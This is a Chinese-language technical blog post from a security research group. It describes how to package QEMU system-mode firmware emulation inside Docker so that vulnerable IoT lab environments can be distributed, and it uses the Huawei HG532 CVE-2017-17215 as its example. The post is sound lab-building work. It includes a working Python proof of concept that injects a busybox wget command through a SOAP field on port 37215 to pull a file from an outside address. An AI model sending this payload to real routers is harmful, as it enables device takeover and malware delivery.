作者:m2ayill(白帽汇安全研究院)
概述
目前的设备模拟都需要用户人工操作,没有一个直接可用的方案,难度大成本高耗时长。而且在各大漏洞靶场中都没有集成,如:Vulfocus 开源靶场,等。本文主要讲述如何在 Docker 中搭建 Qemu 进行 system-mode 模式的固件模拟,实现易于分发开箱即用的硬件模拟环境。要是有需完善地方,请读者留言共同促进改善之。
背景
由于工作内容是物联网安全方向,通常需要购买设备进行分析,但是目前多数的设备漏洞分析只需要有固件,然后将相关程序运行即可。目前网络上通常使用 Qemu 进行固件模拟,其他的就是 Qemu 和其他环境功能 (如:nvram )的包装器如:firmadyne、Firmware Analysis Toolkit、ARM-X 固件仿真框架等。
上述列举的固件模拟工具,都需要用户安装好以后,再传输固件文件系统进行模拟固件服务运行。但是,通常固件模拟总有一些小细节的错误导致失败,而且类似固件模拟成功的文章作者有可能会忽略一些细致点,导致用户找不出问题点,模拟失败。因此一直在想,要是能够将模拟成功的固件环境打包成镜像,用户获取镜像后直接运行镜像就可以获取到固件漏洞点,直接省略了繁杂的固件搭建过程。
要实现这种“开箱即用”,直接想到的便是 Docker,它作为可直接打包其中的应用以及依赖包到一个可移植的容器,完全符合这种需求。网上查了查,现有的 Docker 中集成 Qemu 进行的固件模拟仅仅是利用 user-mode 模式(可执行二进制文件仿真,即开启固件中的单一服务)进行模拟应用运行,很多的服务的依赖包需要在system-mode 模式(固件全局仿真)下才能运行成功。
搭建过程
初步设想需解决点
根据通常 Docker 搭建Web等应用漏洞靶场的思路,即在启动 Docker 后直接访问漏洞点就可以像真正环境中一样利用。推理到固件靶场:
Docker 中需具备:模拟固件的框架,能够外部访问漏洞点,固件文件系统内部能访问外网(也就是漏洞能实际利用了),这就造成了:网络上已经有了 Docker镜像进行 user-mode 模式的固件模拟,但是没有 system-mode 模式,可能就是因为涉及到 Qemu 中的端口转发出来及网络等因素。
● 需要解决:
● Qemu 中模拟漏洞时,如果漏洞是通过端口进行利用的,怎样将端口转发到 Docker
● Qemu 能访问外网
● Qemu 中的服务怎么随着 Docker 启动而启动,即:像 Web类的靶场,直接 Docker 启动就可以将漏洞环境运行起来
搭建过程划分及流程框架图
搭建过程分为如下几步
● MIPS 框架搭建—实现外网访问—端口映射
● Qemu 服务随 Docker 启动而启动
● (额外: Qemu 同步实时更新 Docker 中的文件)
本文模拟的环境案例
● HG532 ,CVE-2017-17215,知识储备章节有写漏洞信息及利用脚本
● 漏洞产生点于组件服务端口 37215 ,从数据包中获取部分信息来进行代码执行
● HG532 固件文件系统类型是 mips 32位的,且格式为大端 MSB。
● 固件下载地址:https://ia601506.us.archive.org/22/items/RouterHG532e/router%20HG532e.rar
PoC 内容如下:
import requests
headers = {
"Authorization": "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
}
data = '''<?xml version="1.0" ?>
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
<s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1">
<NewStatusURL>;/bin/busybox wget -g 1.1.1.1 -l /tmp/.f;</NewStatusURL>
<NewDownloadURL>HUAWEIUPNP</NewDownloadURL>
</u:Upgrade>
</s:Body>
</s:Envelope>
'''
requests.post('http://x.x.x.x:37215/ctrlt/DeviceUpgrade_1',
headers=headers, data=data)
逻辑框架
Docker – Qemu – system-mode 模式的固件模拟流程图
0x01 MIPS 框架搭建—实现外网访问—端口映射
● Docker version 19.03.2 中 Ubuntu 18.04.4 系统 ,安装 qemu-system-mips
apt-get update && apt-get install -y qemu -system-mips && apt-get clean
● Qemu 使用的基础框架:https://people.debian.org/~aurel32/qemu/mips/
● 此处映射了 Qemu 中的两个端口22、37215
qemu-system-mips -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mips_standard.qcow2 -append "root=/dev/sda1 rw console=tty0" -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::5535-:22,hostfwd=tcp::37215-:37215 -nographic
某些固件服务修改网络配置
将固件文件系统传入 Qemu 模拟环境中,尝试运行其中的 mic 服务,会发现在终端运行的 mic 进程退不出来,也就是无法掌控终端了;
在 mic 服务启动的过程中发现网络有修改,也就是意味着ip被修改了,那么转发的端口不能使用了。
使用定时任务修改网络配置
定时任务实现:修改 /etc/crontab 文件,必须要按照格式填写
按照/etc/crontab中的格式填写如下内容:
* * * * * sh /root/changeip.sh
nano changeip.sh,内容如下:
#!/bin/sh
service networking restart
ifup eth0
0x02 固件文件系统的服务自启
解决问题: Qemu 服务随 Docker 启动而启动
启动项加入过程:
路径:/etc/init.d/micc_open
权限:chmod 777 /etc/init.d/micc_open
加入自启项目:update-rc.d mic_open defaults 99
mic_open内容如下:
#!/bin/sh
### BEGIN INIT INFO
# Provides: aaa.com
# Required-Start: $local_fs $network
# Required-Stop: $local_fs
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Desc ription: mic service
# Desc ription: mic service daemon
### END INIT INFO
chroot /root/squashfs-root/ mic
0x03 Qemu 同步实时更新 Docker 中的文件
有个小需求需要用户攻陷设备后获取 flag,也就是需要 Qemu 同步实时更新 Docker 中的 /tmp/flag 文件
解决:只要将 /tmp 目录挂载到 Qemu 中就行,使用 fat:/tmp
Qemu-system-mips -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mips_standard.qcow2 -append "root=/dev/sda1 rw console=tty0" -hdb fat:/tmp -device e1000,netdev=net0 -netdev user,id=net0,hostfwd=tcp::5535-:22,hostfwd=tcp::37215-:37215 -nographic
Qemu 中执行,加入自启动项实现:
fdisk -l
mount /dev/sdb1 /tmp
知识储备
储备1: 端口转发
Qemu 中说明文档:https://wiki.archlinux.org/index.php?title= Qemu
储备2: Qemu联网方式
Qemu 中说明文档:https://wiki.archlinux.org/index.php?title= Qemu
储备3: Qemu 挂载 Docker中的目录
Qemu 中说明文档:https://wiki.archlinux.org/index.php?title= Qemu
挂载主机分区
储备4: Qemu的必备知识点
一篇文章有介绍 Qemu ,如下截图其中的一部分内容,详细可参考:https://nosec.org/home/detail/4213.html
Qemu 必备知识点
储备5: 本文涉及到的Docker知识点
● 网络配置使用的命令,如:ip router
● 在自动运行 Docker 中 Qemu 中固件文件系统中的服务成功之前,想过要是 Docker 能保存当前的运行状态多方便,研究如下:
Docker save与Docker export
save 镜像,不是当前运行的而是原本的,当前运行的镜像不会保存。
export 容器,会保存,但是只是文件。
● Docker 镜像修改保存新镜像,docker commit从容器中创建一个新镜像
- -a :提交的镜像作者
- -m :提交时的说明文字
docker commit [OPTIONS] CONTAINER [REPOSITORY[:TAG]]
docker commit -m="qemu-system-mips_HG532" -a="m2ayill" 553c8ce8df01 mips_huawei_hg532_success_fat_flag:v2
● Dockerfile的编写
● FROM:先从本地查找镜像,若无,再从网上获取镜像
FROM mips_huawei_hg532_success:latest
● MAINTAINER:描述镜像的创建者
MAINTAINER m2ayill
● ADD:在执行 <源文件> 为 tar 压缩文件的话,压缩格式为 gzip, bzip2 以及 xz 的情况下,会自动复制并解压到 <目标路径>,描述镜像的创建者,先从本地查找镜像
ADD <源路径1> <目标路径>
● RUN:执行后面的命令行命令
RUN <命令行命令>
● ENTRYPOINT:类似于 CMD 指令,但其不会被 docker run 的命令行参数指定的指令所覆盖
ENTRYPOINT ["/start.sh"]
在创建镜像时,本人使用了RUN,直接在创建过程中运行了命令 mic 导致直接卡顿,创建不了了,看完本文内容就知道。
● EXPOSE:声明端口
EXPOSE <端口1>
Dockerfile内容如下:
FROM mips_huawei_hg532_success:latest #从本地获取镜像
MAINTAINER m2ayill #镜像的创建者
ADD ./start.sh / #<源文件> :./start.sh 复制并到 <目标路径>:/
RUN chmod 777 /start.sh
ENTRYPOINT ["/start.sh"] #类似于 CMD 指令,但其不会被 docker run 的命令行参数指定的指令所覆盖
EXPOSE 37215 #声明端口
start.sh文件内容
启动 Qemu 的命令
搭建中的踩坑点
0x01_1 端口转发
搭建过程中虽然进行端口转发使用的是 hostfwd ,但是初步想法有过:要实现外部访问 Docker 的端口, Docker 内部得有端口能访问,所以有两种方法实现(其实也是根据 Qemu 中的网络模式划分的):
● 将桥接或虚拟网卡 tap 的端口转发到 Docker 内部端口
● Qemu 直接将端口映射到 Docker 内部端口
根据知识储备1可知:user网络模式 可以实现端口转发到 Docker ,最主要的是可以访问外网,类似于 nat。
这里使用的是 user网络模式 ,( 有兴趣的人,:) 可以试试 tap ,Qemu 说明文档中有写转发过程)
0x01_2 hostfwd的转发端口
● 刚开始尝试时,ssh转发到 Docker 的 5535 端口成功,但是 37215 死活不行,而且本文使用的案例是我使用的第二个案例,第一个案例是雄迈的 telnet 后门漏洞,其中 9527 端口也是转不出来,
- 设想,是不是
hostfwd只能转发一个端口案例推翻假设:尝试了 `cc8160`(第三个案例)启动的是 80 端口和 22 端口,两个端口都能使用 - 后来一步步回想做了哪些操作:
5535 是在没有运行mic 之前,连接成功;
在运行 mic 后,5535 端口也不能使用了;
查看 mic 服务启动过程,发现 mic 服务在运行时将网络环境修改了
● hostfwd转发的端口是只要 Qemu 内部有相应的端口,就可以通过hostfwd设定的端口转发出来,也就是说,内部的服务可以在 Qemu 运行后启动:
设想,ssh 端口是开机自启的,当初还以为只能是系统内部已经启动的端口才能够转出来,而运行 Qemu 后自行启动的端口无法转出
案例推翻假设:将 ssh 端口关闭后, Qemu 转发到 Docker 的端口无法使用 ssh 登录了,重新启动 ssh 服务,又可以使用了
● 与搭建无关的:
通过 Qemu 转发到 Docker 的端口,5535、37215等,其实本地是在类似监听的状态,也就是说 telnet 5535 等端口,都是属于通的状态,无法通过 telnet 来判断是否 Qemu 内部的服务已经启动
0x02 “定时任务”历程
解决办法设想过如下:
● 放入后台,将终端释放出来,没有 nohub 命令,只能通过 & 或者ctrl+z
● 使用ubuntu虚拟机+ Qemu 实现的 ctrl+z 放入后台,bg 的结果是 doing,&结果总是 stopped
● 使用 Docker + Qemu ,两种方法总是 stopped
● 使用 ssh 登录后的终端运行 mic 服务
案例推翻:使用 ssh 运行的 mic 服务,由于运行中断,导致运行不起来
定时任务编写过程:
/var/log/cron
crontab -e,crontab查看内容添加上了
crontab file,crontab 查看内容添加上了
权限问题
重启服务/etc/init.d/cron restart
无意中全局搜索 crontab ,/etc/crontab 符合平常设定定时任务的格式类型,当时脑子也呆了,下意识的直接按照文件原本的格式填写了,(第二天重新设置定时任务,死活不成功,重新走了一下流程,最终发现的原因是,/etc/crontab 填写的内容是复制过来的,没有按照原文格式写:( )
0x03 模拟攻击
到此为止,定时任务设定好,<span style=”color: rgb(0, 0, 0);”>先实现:</span> <span style=”color: rgb(0, 0, 0);”>Qemu 服务手动运行起来利用转发端口到 Docker ,外部能够漏洞利用成功,</span>手动运行mic 服务,结果:访问 ssh 成功、poc 攻击不成
分析原因( 因为过程繁琐没有在Docker中测试,使用单独的Ubuntu 虚拟机+ Qemu ):
● 查看 poc 在 mic 中的运行过程,尝试修改命令为 date ,执行成功
● ssh 登录,执行 wget 有报错信息,什么都不说了,得按照格式来:wget -g ip -l 保存路径(-P 端口,-r 路径)
0x04 “服务自启”历程
手动运行固件服务成功后,就要解决问题: Qemu 服务随 Docker 启动而启动
当时想的很复杂, Qemu 中的固件文件系统中的服务加入启动项,涉及到两个系统,怎么实现
走了一下流程:
chroot /root/squashfs-root/ bin/sh ,进入固件shell中
mic,运行服务
尝试
chroot /root/squashfs-root/ mic,可以运行
那就方便处理了,只要将chroot /root/squashfs-root/ mic在启动 Qemu 时,服务同时运行起来就行,两种方法:
加入启动项
定时任务(想到的第一个办法就是定时任务,没有尝试,原因如下,其实挺后悔的,要不然早弄完了:)
● 设想,定时任务几乎都是随着mic服务运行后执行的,也就是在 Qemu 登录后,没有尝试登录前看看能不能执行;(为什么说Qemu 登录,在下面有写)
● 验证:在后面通过自启项目 mic 运行后,会在 Qemu 启动的过程中卡住,但是定时任务还是执行了,说明在未登录之前定时任务是可以执行的)
启动脚本第一版
mic_open内容如下:
#!/bin/sh
chroot /root/squashfs-root/ mic
尝试:
/etc/profile.d/mic_open,只能在Qemu 登录用户后启动;
/etc/init.d/mic_open、 rd0-6 目录下都添加,不行;
将脚本转成服务,加入自启项目;
使用命令加入自启项目,update-rc.d mic_open defaults 99,发现启动脚本有问题,根据报错信息,有了如下的第二版脚本,再次使用 update-rc.d mic_open defaults 99 ,加入自启项目成功。
mic_open内容如下:
#!/bin/sh
### BEGIN INIT INFO
# Provides: aaa.com
# Required-Start: $local_fs $network
# Required-Stop: $local_fs
# Default-Start: 2 3 4 5
# Default-Stop: 0 1 6
# Short-Desc ription: mic service
# Desc ription: mic service daemon
### END INIT INFO
chroot /root/squashfs-root/ mic
0x05 实现“外网访问”历程
起初不知道 user模式可直接访问外网,而且 ping 执行过不能 ping 通,而且平常使用的是 tap
然后弯路开始了,其实一般都是使用 tap ,这种方法是好的,估计可以执行,在搭建 Qemu 框架就把tap设置好,然后可以访问外网,也能访问 Docker 网络,然后进行 Docker 内部的端口转发(使用 tap 不能用 hostfwd )
环境:基于(完成 Qemu 框架+定时任务修改网络+自启动服务)的 Docker 中
方式:使用的是通过 br 给 tap 设置外网访问
弯路1: Docker 禁用eth0,这网络就访问不了了, Docker 中好多没有安装,很不方便(dhclient br0,没有 dhclient 命令),想着br设置一下就行了,就仿照 eth0 的设置成了静态,不行,
apt-get install isc-dhcp-client
apt-get install iputils-ping
解决:网上搜了一会儿,用了 ip router,仿照正常的eth0设置,通过 ip router add 添加 br
ip route
ip route add default via 172.17.0.1 dev br0
ifconfig br0 172.17.0.2/16
弯路2: 设置好了tap0,使用tap0启动 Qemu ,平常需要登录进 Qemu 修改下网络才可以使用,结果由于自启服务.mic ,在 Qemu 启动过程中直接卡顿了,ssh 也不知道 ip 不能登录
ifconfig eth0 down
brctl addbr br0
brctl addif br0 eth0
brctl stp br0 off
brctl setfd br0 1
brctl sethello br0 1
ifconfig br0 0.0.0.0 promisc up
ifconfig eth0 0.0.0.0 promisc up
解决:网上搜了:-net tap 与 -netdi v user,才了解到:user 网络模式 ,可以联网是类似 nat 不能通过 ping命令访问外网。
也就是无形当中,网络 已经是好的,可以访问外网。
到目前为止, Docker 实现固件模拟漏洞环境成功。
未完待续
目前已将该 Docker 的固件漏洞环境镜像上传到Vulfocus :https://hub.docker.com/r/vulfocus/hg532-cve-2017-17215,直接拉取镜像可启动固件漏洞环境,启动 Qemu 过程需要 4-5 分钟。希望读者阅读完本文,能将更多的环境集成到 Vulfocus 。
拓展
本文使用案例的是 mips 框架,同样是适用于其他环境如:ARM、i386 等。拓展开来,Docker目前不能搭建 Windows 漏洞环境,有这种需求的可以借助本文方法实现:Docker-Qemu-Windows。
问题汇总
有问题可以在 GitHub 提 issue, 也可在下方的讨论组里
GitHub issue: https://github.com/fofapro/vulfocus/issues
微信群: 通过扫描以下二维码加入并且备注 申请 Vulfocus 加入 Vulfocus 官方微信群:
参考资料
https://www.freebuf.com/vuls/160040.html
https://blog.csdn.net/u013554213/java/article/details/78792686
本文为白帽汇原创文章,如需转载请注明来源:https://nosec.org/home/detail/4458.html






